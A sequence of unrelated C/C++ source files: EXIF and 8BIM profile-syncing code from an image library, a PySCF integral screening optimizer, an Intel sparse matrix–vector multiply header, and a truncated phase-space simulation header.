if (*length < 2)
return(0);
value=ReadProfileShort(MSBEndian,*p);
(*length)-=2;
*p+=2;
return(value);
}
static inline void WriteProfileLong(const EndianType endian,
const size_t value,unsigned char *p)
{
unsigned char
buffer[4];
if (endian == LSBEndian)
{
buffer[0]=(unsigned char) value;
buffer[1]=(unsigned char) (value >> 8);
buffer[2]=(unsigned char) (value >> 16);
buffer[3]=(unsigned char) (value >> 24);
(void) memcpy(p,buffer,4);
return;
}
buffer[0]=(unsigned char) (value >> 24);
buffer[1]=(unsigned char) (value >> 16);
buffer[2]=(unsigned char) (value >> 8);
buffer[3]=(unsigned char) value;
(void) memcpy(p,buffer,4);
}
static void WriteProfileShort(const EndianType endian,
const unsigned short value,unsigned char *p)
{
unsigned char
buffer[2];
if (endian == LSBEndian)
{
buffer[0]=(unsigned char) value;
buffer[1]=(unsigned char) (value >> 8);
(void) memcpy(p,buffer,2);
return;
}
buffer[0]=(unsigned char) (value >> 8);
buffer[1]=(unsigned char) value;
(void) memcpy(p,buffer,2);
}
static MagickBooleanType Sync8BimProfile(Image *image,StringInfo *profile)
{
size_t
length;
ssize_t
count;
unsigned char
*p;
unsigned short
id;
length=GetStringInfoLength(profile);
p=GetStringInfoDatum(profile);
while (length != 0)
{
if (ReadProfileByte(&p,&length) != 0x38)
continue;
if (ReadProfileByte(&p,&length) != 0x42)
continue;
if (ReadProfileByte(&p,&length) != 0x49)
continue;
if (ReadProfileByte(&p,&length) != 0x4D)
continue;
if (length < 7)
return(MagickFalse);
id=ReadProfileMSBShort(&p,&length);
count=(ssize_t) ReadProfileByte(&p,&length);
if ((count >= (ssize_t) length) || (count < 0))
return(MagickFalse);
p+=count;
length-=count;
if ((*p & 0x01) == 0)
(void) ReadProfileByte(&p,&length);
count=(ssize_t) ReadProfileMSBLong(&p,&length);
if ((count > (ssize_t) length) || (count < 0))
return(MagickFalse);
if ((id == 0x3ED) && (count == 16))
{
if (image->units == PixelsPerCentimeterResolution)
WriteProfileLong(MSBEndian,(unsigned int) (image->x_resolution*2.54*
65536.0),p);
else
WriteProfileLong(MSBEndian,(unsigned int) (image->x_resolution*
65536.0),p);
WriteProfileShort(MSBEndian,(unsigned short) image->units,p+4);
if (image->units == PixelsPerCentimeterResolution)
WriteProfileLong(MSBEndian,(unsigned int) (image->y_resolution*2.54*
65536.0),p+8);
else
WriteProfileLong(MSBEndian,(unsigned int) (image->y_resolution*
65536.0),p+8);
WriteProfileShort(MSBEndian,(unsigned short) image->units,p+12);
}
p+=count;
length-=count;
}
return(MagickTrue);
}
static MagickBooleanType SyncExifProfile(Image *image, StringInfo *profile)
{
#define MaxDirectoryStack 16
#define EXIF_DELIMITER "\n"
#define EXIF_NUM_FORMATS 12
#define TAG_EXIF_OFFSET 0x8769
#define TAG_INTEROP_OFFSET 0xa005
typedef struct _DirectoryInfo
{
unsigned char
*directory;
size_t
entry;
} DirectoryInfo;
DirectoryInfo
directory_stack[MaxDirectoryStack];
EndianType
endian;
size_t
entry,
length,
number_entries;
SplayTreeInfo
*exif_resources;
ssize_t
id,
level,
offset;
static int
format_bytes[] = {0, 1, 1, 2, 4, 8, 1, 1, 2, 4, 8, 4, 8};
unsigned char
*directory,
*exif;
/*
Set EXIF resolution tag.
*/
length=GetStringInfoLength(profile);
exif=GetStringInfoDatum(profile);
if (length < 16)
return(MagickFalse);
id=(ssize_t) ReadProfileShort(LSBEndian,exif);
if ((id != 0x4949) && (id != 0x4D4D))
{
while (length != 0)
{
if (ReadProfileByte(&exif,&length) != 0x45)
continue;
if (ReadProfileByte(&exif,&length) != 0x78)
continue;
if (ReadProfileByte(&exif,&length) != 0x69)
continue;
if (ReadProfileByte(&exif,&length) != 0x66)
continue;
if (ReadProfileByte(&exif,&length) != 0x00)
continue;
if (ReadProfileByte(&exif,&length) != 0x00)
continue;
break;
}
if (length < 16)
return(MagickFalse);
id=(ssize_t) ReadProfileShort(LSBEndian,exif);
}
endian=LSBEndian;
if (id == 0x4949)
endian=LSBEndian;
else
if (id == 0x4D4D)
endian=MSBEndian;
else
return(MagickFalse);
if (ReadProfileShort(endian,exif+2) != 0x002a)
return(MagickFalse);
/*
This the offset to the first IFD.
*/
offset=(ssize_t) ReadProfileLong(endian,exif+4);
if ((offset < 0) || ((size_t) offset >= length))
return(MagickFalse);
directory=exif+offset;
level=0;
entry=0;
exif_resources=NewSplayTree((int (*)(const void *,const void *)) NULL,
(void *(*)(void *)) NULL,(void *(*)(void *)) NULL);
do
{
if (level > 0)
{
level--;
directory=directory_stack[level].directory;
entry=directory_stack[level].entry;
}
if ((directory < exif) || (directory > (exif+length-2)))
break;
/*
Determine how many entries there are in the current IFD.
*/
number_entries=ReadProfileShort(endian,directory);
for ( ; entry < number_entries; entry++)
{
int
components;
register unsigned char
*p,
*q;
size_t
number_bytes;
ssize_t
format,
tag_value;
q=(unsigned char *) (directory+2+(12*entry));
if (q > (exif+length-12))
break; /* corrupt EXIF */
if (GetValueFromSplayTree(exif_resources,q) == q)
break;
(void) AddValueToSplayTree(exif_resources,q,q);
tag_value=(ssize_t) ReadProfileShort(endian,q);
format=(ssize_t) ReadProfileShort(endian,q+2);
if ((format < 0) || ((format-1) >= EXIF_NUM_FORMATS))
break;
components=(int) ReadProfileLong(endian,q+4);
if (components < 0)
break; /* corrupt EXIF */
number_bytes=(size_t) components*format_bytes[format];
if ((ssize_t) number_bytes < components)
break; /* prevent overflow */
if (number_bytes <= 4)
p=q+8;
else
{
/*
The directory entry contains an offset.
*/
offset=(ssize_t) ReadProfileLong(endian,q+8);
if ((offset < 0) || ((size_t) (offset+number_bytes) > length))
continue;
if (~length < number_bytes)
continue; /* prevent overflow */
p=(unsigned char *) (exif+offset);
}
switch (tag_value)
{
case 0x011a:
{
(void) WriteProfileLong(endian,(size_t) (image->x_resolution+0.5),p);
(void) WriteProfileLong(endian,1UL,p+4);
break;
}
case 0x011b:
{
(void) WriteProfileLong(endian,(size_t) (image->y_resolution+0.5),p);
(void) WriteProfileLong(endian,1UL,p+4);
break;
}
case 0x0112:
{
if (number_bytes == 4)
{
(void) WriteProfileLong(endian,(size_t) image->orientation,p);
break;
}
(void) WriteProfileShort(endian,(unsigned short) image->orientation,
p);
break;
}
case 0x0128:
{
if (number_bytes == 4)
{
(void) WriteProfileLong(endian,(size_t) (image->units+1),p);
break;
}
(void) WriteProfileShort(endian,(unsigned short) (image->units+1),p);
break;
}
default:
break;
}
if ((tag_value == TAG_EXIF_OFFSET) || (tag_value == TAG_INTEROP_OFFSET))
{
offset=(ssize_t) ReadProfileLong(endian,p);
if (((size_t) offset < length) && (level < (MaxDirectoryStack-2)))
{
directory_stack[level].directory=directory;
entry++;
directory_stack[level].entry=entry;
level++;
directory_stack[level].directory=exif+offset;
directory_stack[level].entry=0;
level++;
if ((directory+2+(12*number_entries)) > (exif+length))
break;
offset=(ssize_t) ReadProfileLong(endian,directory+2+(12*
number_entries));
if ((offset != 0) && ((size_t) offset < length) &&
(level < (MaxDirectoryStack-2)))
{
directory_stack[level].directory=exif+offset;
directory_stack[level].entry=0;
level++;
}
}
break;
}
}
} while (level > 0);
exif_resources=DestroySplayTree(exif_resources);
return(MagickTrue);
}
MagickExport MagickBooleanType SyncImageProfiles(Image *image)
{
MagickBooleanType
status;
StringInfo
*profile;
status=MagickTrue;
profile=(StringInfo *) GetImageProfile(image,"8BIM");
if (profile != (StringInfo *) NULL)
if (Sync8BimProfile(image,profile) == MagickFalse)
status=MagickFalse;
profile=(StringInfo *) GetImageProfile(image,"EXIF");
if (profile != (StringInfo *) NULL)
if (SyncExifProfile(image,profile) == MagickFalse)
status=MagickFalse;
return(status);
}
|
optimizer.c | /* Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*
* Author: Qiming Sun <osirpt.sun@gmail.com>
*/
#include <stdlib.h>
#include <string.h>
#include <math.h>
#include <assert.h>
#include "cint.h"
#include "cvhf.h"
#include "optimizer.h"
#define MAX(I,J) ((I) > (J) ? (I) : (J))
int int2e_sph();
int GTOmax_cache_size(int (*intor)(), int *shls_slice, int ncenter,
int *atm, int natm, int *bas, int nbas, double *env);
void CVHFinit_optimizer(CVHFOpt **opt, int *atm, int natm,
int *bas, int nbas, double *env)
{
CVHFOpt *opt0 = (CVHFOpt *)malloc(sizeof(CVHFOpt));
opt0->nbas = nbas;
opt0->direct_scf_cutoff = 1e-14;
opt0->q_cond = NULL;
opt0->dm_cond = NULL;
opt0->fprescreen = &CVHFnoscreen;
opt0->r_vkscreen = &CVHFr_vknoscreen;
*opt = opt0;
}
void CVHFdel_optimizer(CVHFOpt **opt)
{
CVHFOpt *opt0 = *opt;
if (!opt0) {
return;
}
if (!opt0->q_cond) {
free(opt0->q_cond);
}
if (!opt0->dm_cond) {
free(opt0->dm_cond);
}
free(opt0);
*opt = NULL;
}
int CVHFnoscreen(int *shls, CVHFOpt *opt,
int *atm, int *bas, double *env)
{
return 1;
}
int CVHFnr_schwarz_cond(int *shls, CVHFOpt *opt,
int *atm, int *bas, double *env)
{
if (!opt) {
return 1;
}
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int n = opt->nbas;
assert(opt->q_cond);
assert(i < n);
assert(j < n);
assert(k < n);
assert(l < n);
double qijkl = opt->q_cond[i*n+j] * opt->q_cond[k*n+l];
return qijkl > opt->direct_scf_cutoff;
}
int CVHFnrs8_prescreen(int *shls, CVHFOpt *opt,
int *atm, int *bas, double *env)
{
if (!opt) {
return 1; // no screen
}
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int n = opt->nbas;
assert(opt->q_cond);
assert(opt->dm_cond);
assert(i < n);
assert(j < n);
assert(k < n);
assert(l < n);
double qijkl = opt->q_cond[i*n+j] * opt->q_cond[k*n+l];
double dmin = opt->direct_scf_cutoff / qijkl;
return qijkl > opt->direct_scf_cutoff
&&((4*opt->dm_cond[j*n+i] > dmin)
|| (4*opt->dm_cond[l*n+k] > dmin)
|| ( opt->dm_cond[j*n+k] > dmin)
|| ( opt->dm_cond[j*n+l] > dmin)
|| ( opt->dm_cond[i*n+k] > dmin)
|| ( opt->dm_cond[i*n+l] > dmin));
}
// return flag to decide whether transpose01324
int CVHFr_vknoscreen(int *shls, CVHFOpt *opt,
double **dms_cond, int n_dm, double *dm_atleast,
int *atm, int *bas, double *env)
{
int idm;
for (idm = 0; idm < n_dm; idm++) {
dms_cond[idm] = NULL;
}
*dm_atleast = 0;
return 1;
}
void CVHFset_direct_scf_cutoff(CVHFOpt *opt, double cutoff)
{
opt->direct_scf_cutoff = cutoff;
}
double CVHFget_direct_scf_cutoff(CVHFOpt *opt)
{
return opt->direct_scf_cutoff;
}
void CVHFsetnr_direct_scf(CVHFOpt *opt, int (*intor)(), CINTOpt *cintopt,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
/* This memory is released in void CVHFdel_optimizer, Don't know
* why valgrind raises memory leak here */
if (opt->q_cond) {
free(opt->q_cond);
}
opt->q_cond = (double *)malloc(sizeof(double) * nbas*nbas);
int shls_slice[] = {0, nbas};
const int cache_size = GTOmax_cache_size(intor, shls_slice, 1,
atm, natm, bas, nbas, env);
#pragma omp parallel default(none) \
shared(opt, intor, cintopt, ao_loc, atm, natm, bas, nbas, env)
{
double qtmp, tmp;
int ij, i, j, di, dj, ish, jsh;
int shls[4];
double *cache = malloc(sizeof(double) * cache_size);
di = 0;
for (ish = 0; ish < nbas; ish++) {
dj = ao_loc[ish+1] - ao_loc[ish];
di = MAX(di, dj);
}
double *buf = malloc(sizeof(double) * di*di*di*di);
#pragma omp for schedule(dynamic, 4)
for (ij = 0; ij < nbas*(nbas+1)/2; ij++) {
ish = (int)(sqrt(2*ij+.25) - .5 + 1e-7);
jsh = ij - ish*(ish+1)/2;
di = ao_loc[ish+1] - ao_loc[ish];
dj = ao_loc[jsh+1] - ao_loc[jsh];
shls[0] = ish;
shls[1] = jsh;
shls[2] = ish;
shls[3] = jsh;
qtmp = 1e-100;
if (0 != (*intor)(buf, NULL, shls, atm, natm, bas, nbas, env,
cintopt, cache)) {
for (i = 0; i < di; i++) {
for (j = 0; j < dj; j++) {
tmp = fabs(buf[i+di*j+di*dj*i+di*dj*di*j]);
qtmp = MAX(qtmp, tmp);
} }
qtmp = sqrt(qtmp);
}
opt->q_cond[ish*nbas+jsh] = qtmp;
opt->q_cond[jsh*nbas+ish] = qtmp;
}
free(buf);
free(cache);
}
}
void CVHFsetnr_direct_scf_dm(CVHFOpt *opt, double *dm, int nset, int *ao_loc,
int *atm, int natm, int *bas, int nbas, double *env)
{
if (opt->dm_cond) { // NOT reuse opt->dm_cond because nset may be diff in different call
free(opt->dm_cond);
}
opt->dm_cond = (double *)malloc(sizeof(double) * nbas*nbas);
memset(opt->dm_cond, 0, sizeof(double)*nbas*nbas);
const int nao = ao_loc[nbas];
double dmax, tmp;
int i, j, ish, jsh;
int iset;
double *pdm;
for (ish = 0; ish < nbas; ish++) {
for (jsh = 0; jsh < nbas; jsh++) {
dmax = 0;
for (iset = 0; iset < nset; iset++) {
pdm = dm + nao*nao*iset;
for (i = ao_loc[ish]; i < ao_loc[ish+1]; i++) {
for (j = ao_loc[jsh]; j < ao_loc[jsh+1]; j++) {
tmp = fabs(pdm[i*nao+j]);
dmax = MAX(dmax, tmp);
} }
}
opt->dm_cond[ish*nbas+jsh] = dmax;
} }
}
/*
*************************************************
*/
void CVHFnr_optimizer(CVHFOpt **vhfopt, int (*intor)(), CINTOpt *cintopt,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
CVHFinit_optimizer(vhfopt, atm, natm, bas, nbas, env);
(*vhfopt)->fprescreen = &CVHFnrs8_prescreen;
CVHFsetnr_direct_scf(*vhfopt, intor, cintopt, ao_loc,
atm, natm, bas, nbas, env);
}
|
spmspv.h | /******************************************************************************
* ** Copyright (c) 2016, Intel Corporation **
* ** All rights reserved. **
* ** **
* ** Redistribution and use in source and binary forms, with or without **
* ** modification, are permitted provided that the following conditions **
* ** are met: **
* ** 1. Redistributions of source code must retain the above copyright **
* ** notice, this list of conditions and the following disclaimer. **
* ** 2. Redistributions in binary form must reproduce the above copyright **
* ** notice, this list of conditions and the following disclaimer in the **
* ** documentation and/or other materials provided with the distribution. **
* ** 3. Neither the name of the copyright holder nor the names of its **
* ** contributors may be used to endorse or promote products derived **
* ** from this software without specific prior written permission. **
* ** **
* ** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS **
* ** "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT **
* ** LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR **
* ** A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT **
* ** HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, **
* ** SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED **
* ** TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR **
* ** PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF **
* ** LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING **
* ** NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS **
* ** SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
* * ******************************************************************************/
/* Narayanan Sundaram (Intel Corp.), Michael Anderson (Intel Corp.)
* * ******************************************************************************/
#ifndef SRC_SINGLENODE_SPMSPV_H_
#define SRC_SINGLENODE_SPMSPV_H_
#include <xmmintrin.h>
#include "GMDP/utils/bitvector.h"
template <typename Ta, typename Tx, typename Ty>
void my_spmspv(int* row_inds, int* col_ptrs, int* col_indices, Ta* vals,
int num_partitions, int* row_pointers, int* col_starts,
int* edge_pointers, Tx* xvalue, int * xbit_vector, Ty* yvalue,
int * ybit_vector, int m, int n, int* nnz, void (*op_mul)(const Ta&, const Tx&, Ty*, void*),
void (*op_add)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
// int * new_nnz = new int[num_partitions];
// memset(new_nnz, 0, num_partitions * sizeof(int));
#pragma omp parallel for schedule(dynamic, 1)
for (int p = 0; p < num_partitions; p++) {
// For each column
const int* column_offset = col_indices + col_starts[p];
const int* partitioned_row_offset = row_inds + edge_pointers[p];
const Ta* partitioned_val_offset = vals + edge_pointers[p];
const int* col_ptrs_cur = col_ptrs + col_starts[p];
for (int j = 0; j < (col_starts[p + 1] - col_starts[p]) - 1 ; j++) {
int col_index = col_indices[col_starts[p] + j];
if(get_bitvector(col_index, xbit_vector)) {
Tx Xval = xvalue[col_index];
_mm_prefetch((char*)(xvalue + column_offset[j + 4]), _MM_HINT_T0);
int nz_idx = col_ptrs_cur[j];
for (; nz_idx < col_ptrs_cur[j + 1]; nz_idx++) {
int row_ind = partitioned_row_offset[nz_idx];
Ta Aval = partitioned_val_offset[nz_idx];
Ty temp_mul_result;
op_mul(Aval, Xval, &temp_mul_result, vsp);
if(get_bitvector(row_ind, ybit_vector))
{
//Ty temp_y_copy = yvalue[row_ind];
//op_add(temp_y_copy, temp_mul_result, &(yvalue[row_ind]), vsp);
op_add(yvalue[row_ind], temp_mul_result, &(yvalue[row_ind]), vsp);
}
else
{
yvalue[row_ind] = temp_mul_result;
set_bitvector(row_ind, ybit_vector);
}
}
}
}
}
for (int p = 0; p < num_partitions; p++) {
// nnz += new_nnz[p];
}
*nnz = m * n;
}
template <typename Ta, typename Tx, typename Ty>
void my_csrspmspv(Ta* a, int* ia, int* ja, Tx* xvalue, int * xbit_vector,
Ty* yvalue, int * ybit_vector, int m, int n, int* nnz,
void (*op_mul)(const Ta&, const Tx&, Ty*, void*), void (*op_add)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
int num_partitions = omp_get_max_threads() * 4;
int rows_per_partition = (m + num_partitions - 1) / num_partitions;
rows_per_partition = ((rows_per_partition + 31) / 32) * 32;
#pragma omp parallel for schedule(dynamic, 1)
for(int partition = 0 ; partition < num_partitions ; partition++)
{
int start_row = partition * rows_per_partition;
int end_row = (partition+1) * rows_per_partition;
if(end_row > m) end_row = m;
for(int row = start_row ; row < end_row ; row++)
{
bool row_exists = get_bitvector(row, ybit_vector);
Ty yval;
if(row_exists)
{
yval = yvalue[row];
}
for (int nz = ia[row]; nz < ia[row + 1]; nz++) {
Ty tmp_mul;
int col_id = ja[nz-1]-1;
if(get_bitvector(col_id, xbit_vector))
{
op_mul(a[nz - 1], xvalue[col_id], &tmp_mul, vsp);
if(row_exists)
{
Ty tmp_add = yval;
op_add(tmp_add, tmp_mul, &yval, vsp);
}
else
{
yval = tmp_mul;
set_bitvector(row, ybit_vector);
row_exists=true;
}
}
}
if(row_exists)
{
yvalue[row] = yval;
}
}
}
//*nnz = m * n;
}
template <typename Ta, typename Tx, typename Ty>
void my_dcsrspmspv(Ta* a, int* ia, int* ja, int * row_ids, int num_rows, int * partition_ptrs, int num_partitions,
Tx* xvalue, int * xbit_vector,
Ty* yvalue, int * ybit_vector, int m, int n, int* nnz,
void (*op_mul)(const Ta&, const Tx&, Ty*, void*), void (*op_add)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
#pragma omp parallel for schedule(dynamic, 1)
for(int p = 0 ; p < num_partitions ; p++)
{
for(int _row = partition_ptrs[p] ; _row < partition_ptrs[p+1] ; _row++)
{
int row = row_ids[_row];
bool row_exists = get_bitvector(row, ybit_vector);
Ty yval;
if(row_exists)
{
yval = yvalue[row];
}
for (int nz = ia[_row]; nz < ia[_row + 1]; nz++) {
Ty tmp_mul;
int col_id = ja[nz];
if(get_bitvector(col_id, xbit_vector))
{
op_mul(a[nz], xvalue[col_id], &tmp_mul, vsp);
if(row_exists)
{
Ty tmp_add = yval;
op_add(tmp_add, tmp_mul, &yval, vsp);
}
else
{
yval = tmp_mul;
row_exists=true;
}
}
}
if(row_exists)
{
set_bitvector(row, ybit_vector);
yvalue[row] = yval;
}
}
}
}
template <typename Ta, typename Tx, typename Ty>
void my_coospmspv(Ta* a, int* ia, int* ja, int num_partitions, int * partition_starts,
Tx* xvalue, int * xbit_vector,
Ty* yvalue, int * ybit_vector, int m, int n, int* nnz,
void (*op_mul)(const Ta&, const Tx&, Ty*, void*), void (*op_add)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
#pragma omp parallel for schedule(dynamic, 1)
for(int partition = 0 ; partition < num_partitions ; partition++)
{
for(int nz = partition_starts[partition] ; nz < partition_starts[partition+1] ; nz++)
{
int row = ia[nz]-1;
int col = ja[nz]-1;
#ifdef __DEBUG
assert(row < m);
assert(row >= 0);
assert(col < n);
assert(col >= 0);
#endif
if(get_bitvector(col, xbit_vector))
{
Ty tmp_mul;
op_mul(a[nz], xvalue[col], &tmp_mul, vsp);
bool row_exists = get_bitvector(row, ybit_vector);
if(!row_exists)
{
yvalue[row] = tmp_mul;
}
else
{
Ty tmp_add = yvalue[row];
Ty yval;
op_add(tmp_add, tmp_mul, &yval, vsp);
yvalue[row] = yval;
}
set_bitvector(row, ybit_vector);
}
}
}
}
template <typename Ta, typename Tx, typename Ty>
void mult_segment(const DCSCTile<Ta>* tile, DenseSegment<Tx>* segmentx,
DenseSegment<Ty>* segmenty,
void (*mul_fp)(const Ta&, const Tx&, Ty*, void*), void (*add_fp)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
segmenty->alloc();
segmenty->initialize();
#ifdef __TIMING
printf("\t\tIn here 1\n");
#endif
my_spmspv(tile->row_inds, tile->col_ptrs, tile->col_indices, tile->vals,
tile->num_partitions, tile->row_pointers, tile->col_starts,
tile->edge_pointers, segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->m, tile->n, (&segmenty->properties->nnz),
mul_fp, add_fp, vsp);
segmenty->properties->nnz = segmenty->compute_nnz();
}
template <typename Ta, typename Tx, typename Ty>
void mult_segment(const HybridTile<Ta>* tile, const DenseSegment<Tx> * segmentx,
DenseSegment<Ty>* segmenty,
void (*mul_fp)(const Ta&, const Tx&, Ty*, void*), void (*add_fp)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
segmenty->alloc();
segmenty->initialize();
#ifdef __TIMING
printf("\t\tIn here 2\n");
#endif
int nnz = 0;
if(tile->t1->nnz > 0)
{
my_dcsrspmspv(tile->t1->a, tile->t1->ia, tile->t1->ja, tile->t1->row_ids, tile->t1->num_rows, tile->t1->partition_ptrs, tile->t1->num_partitions, segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->t1->m, tile->t1->n, (&nnz),
mul_fp, add_fp, vsp);
}
if(tile->t2->nnz > 0)
{
my_coospmspv(tile->t2->a, tile->t2->ia, tile->t2->ja, tile->t2->num_partitions, tile->t2->partition_start,
segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->t2->m, tile->t2->n, (&nnz),
mul_fp, add_fp, vsp);
}
segmenty->properties->nnz = segmenty->compute_nnz();
}
template <typename Ta, typename Tx, typename Ty>
void mult_segment(const CSRTile<Ta>* tile, const DenseSegment<Tx> * segmentx,
DenseSegment<Ty>* segmenty,
void (*mul_fp)(const Ta&, const Tx&, Ty*, void*), void (*add_fp)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
segmenty->alloc();
segmenty->initialize();
#ifdef __TIMING
printf("\t\tIn here 3\n");
#endif
int nnz = 0;
if(tile->nnz > 0)
{
my_csrspmspv(tile->a, tile->ia, tile->ja, segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->m, tile->n, (&nnz),
mul_fp, add_fp, vsp);
}
segmenty->properties->nnz = segmenty->compute_nnz();
}
template <typename Ta, typename Tx, typename Ty>
void mult_segment(const COOTile<Ta>* tile, const DenseSegment<Tx>* segmentx,
DenseSegment<Ty>* segmenty,
void (*mul_fp)(const Ta&, const Tx&, Ty*, void*), void (*add_fp)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
segmenty->alloc();
segmenty->initialize();
#ifdef __TIMING
printf("\t\tIn here 4\n");
#endif
int nnz = 0;
if(tile->nnz > 0)
{
my_coospmspv(tile->a, tile->ia, tile->ja, tile->num_partitions, tile->partition_start,
segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->m, tile->n, (&nnz),
mul_fp, add_fp, vsp);
}
segmenty->properties->nnz = segmenty->compute_nnz();
}
template <typename Ta, typename Tx, typename Ty>
void mult_segment(const COOSIMD32Tile<Ta>* tile, const DenseSegment<Tx>* segmentx,
DenseSegment<Ty>* segmenty,
void (*mul_fp)(const Ta&, const Tx&, Ty*, void*), void (*add_fp)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
segmenty->alloc();
segmenty->initialize();
#ifdef __TIMING
printf("\t\tIn here 5\n");
#endif
int nnz = 0;
if(tile->nnz > 0)
{
my_coospmspv(tile->a, tile->ia, tile->ja, tile->num_partitions, tile->partition_start,
segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->m, tile->n, (&nnz),
mul_fp, add_fp, vsp);
}
segmenty->properties->nnz = segmenty->compute_nnz();
}
#endif // SRC_SINGLENODE_SPMSPV_H_
|
cwa_smd.h | #ifndef METHODS_CWA_SMD_H
#define METHODS_CWA_SMD_H
namespace method {
namespace cwa_smd {
namespace details {
template<typename Function>
auto expectation(const Function & function,
const arma::mat & points,
const arma::vec & weights,
const arma::vec & scaling) {
const arma::mat scaled_points = arma::diagmat(1 / scaling) * points;
auto result = at(function, scaled_points);
return arma::dot(result, weights) / arma::sum(weights);
}
template<typename T>
auto at_search(const math::polynomial::Term <T> & term,
const arma::mat & points,
const arma::vec & weights,
const arma::vec & expectations,
const arma::uvec & table,
const arma::vec & scaling,
const arma::uword grade) {
if ((arma::uword) arma::sum(term.exponents) >= grade) {
return expectation(term, points, weights, scaling);
} else {
const arma::uvec indices = arma::conv_to<arma::uvec>::from(term.exponents);
return term.coef *
expectations(math::space::indices_to_index(indices, table));
}
}
template<typename T>
auto at_search(const math::Polynomial <T> & polynomial,
const arma::mat & points,
const arma::vec & weights,
const arma::vec & expectations,
const arma::uvec & table,
const arma::vec & scaling,
const arma::uword grade) {
auto result = at_search(polynomial.term(0), points, weights, expectations,
table, scaling, grade);
for (arma::uword i = 1; i < polynomial.coefs.n_elem; i++) {
result += at_search(polynomial.term(i), points, weights, expectations,
table, scaling, grade);
}
return result;
}
} // namespace details
struct State {
public:
arma::mat points;
arma::vec weights;
arma::vec masses;
arma::uword grade;
arma::uvec expectation_table;
arma::vec expectations;
arma::uvec positional_indices;
arma::uvec momentum_indices;
arma::vec scaling;
// Establish an easy way to construct your State
template<typename PhaseSpaceDistribution>
State(const PhaseSpaceDistribution & initial,
const arma::uvec & grid,
const arma::mat & range,
const arma::vec & masses,
const arma::uword grade) :
points(math::space::points_generate(grid, range)),
weights(arma::real(at(initial, points))),
masses(masses),
grade(grade),
expectation_table(math::space::grids_to_table(
grade * arma::ones<arma::uvec>(points.n_rows))) {
if (grid.n_rows != range.n_rows) {
throw Error("Different dimension between the grid and the range");
}
if (grid.n_rows != 2 * masses.n_rows) {
throw Error("Different dimension between the grid and the masses");
}
const arma::uword dimension = grid.n_elem;
const arma::uword length = std::pow(grade, dimension);
this->expectations = arma::vec(length);
this->positional_indices = arma::uvec(dimension / 2);
this->momentum_indices = arma::uvec(dimension / 2);
const arma::vec ranges = range.col(1) - range.col(0);
this->scaling = ranges;
// exponents check in
#pragma omp parallel for
for (arma::uword i = 0; i < dimension / 2; i++) {
arma::uvec X = arma::zeros<arma::uvec>(dimension);
arma::uvec P = arma::zeros<arma::uvec>(dimension);
X(i) = 1;
P(i + dimension / 2) = 1;
this->positional_indices(i) =
math::space::indices_to_index(X, this->expectation_table);
this->momentum_indices(i) =
math::space::indices_to_index(P, this->expectation_table);
}
// expectations check in
#pragma omp parallel for
for (arma::uword i = 0; i < length; i++) {
const lvec indices =
arma::conv_to<lvec>::from(
math::space::index_to_indices(i, this->expectation_table));
this->expectations(i) =
details::expectation(math::polynomial::Term(1.0, indices),
this->points, this->weights, this->scaling);
}
}
template<typename PhaseSpaceDistribution>
State(const PhaseSpaceDistribution & initial,
const arma::uvec & grid,
const arma::mat & range,
const arma::uword grade) :
points(math::space::points_generate(grid, range)),
weights(arma::real(at(initial, points))),
masses(arma::ones<arma::vec>(grid.n_rows / 2)),
grade(grade),
expectation_table(math::space::grids_to_table(
grade * arma::ones<arma::uvec>(points.n_rows))) {
if (grid.n_rows != range.n_rows) {
throw Error("Different dimension between the grid and the range");
}
if (grid.n_rows != 2 * masses.n_rows) {
throw Error("Different dimension between the grid and the masses");
}
const auto dimension = grid.n_elem;
const auto length = std::pow(grade, dimension);
this->expectations = arma::vec(length);
this->positional_indices = arma::uvec(dimension / 2);
this->momentum_indices = arma::uvec(dimension / 2);
const arma::vec ranges = range.col(1) - range.col(0);
this->scaling = ranges;
// exponents check in
for (arma::uword i = 0; i < dimension / 2; i++) {
arma::uvec X = arma::zeros<arma::uvec>(dimension);
arma::uvec P = arma::zeros<arma::uvec>(dimension);
